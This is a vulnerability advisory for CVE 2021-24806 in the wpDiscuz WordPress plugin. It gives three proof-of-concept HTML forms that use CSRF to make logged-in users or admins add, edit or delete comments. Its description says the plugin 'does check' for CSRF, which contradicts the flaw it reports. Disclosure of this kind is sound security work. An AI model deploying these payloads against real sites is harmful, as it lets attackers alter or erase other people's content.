wpDiscuz < 7.3.4 – Arbitrary Comment Addition/Edition/Deletion via CSRF | CVE 2021-24806

Description

The plugin does check for CSRF when adding, editing and deleting comments, which could allow attacker to make logged in users such as admin edit and delete arbitrary comment, or the user who made the comment to edit it via a CSRF attack. Attackers could also make logged in users post arbitrary comment.

Other affected actions: wpdCloseThread (to close/open threads), wpdStickComment (to stick/unstick a comment)

Proof of Concept

To make the logged in user add a comment
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wpdAddComment" />
      <input type="hidden" name="wc_comment" value="Comment added via CSRF" />
      <input type="hidden" name="submit" value="Post Comment" />
      <input type="hidden" name="wpdiscuz_unique_id" value="dummy" />
      <input type="hidden" name="postId" value="811" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


To delete a comment (CSRF against an admin)
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wpdDeleteComment" />
      <input type="hidden" name="id" value="27" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


To edit a comment (CSRF against user who made the comment or an admin to modify any comment)
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wpdSaveEditedComment" />
      <input type="hidden" name="commentId" value="6" />
      <input type="hidden" name="wc_comment" value="Attacker CSRF" />
      <input type="hidden" name="postId" value="811" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>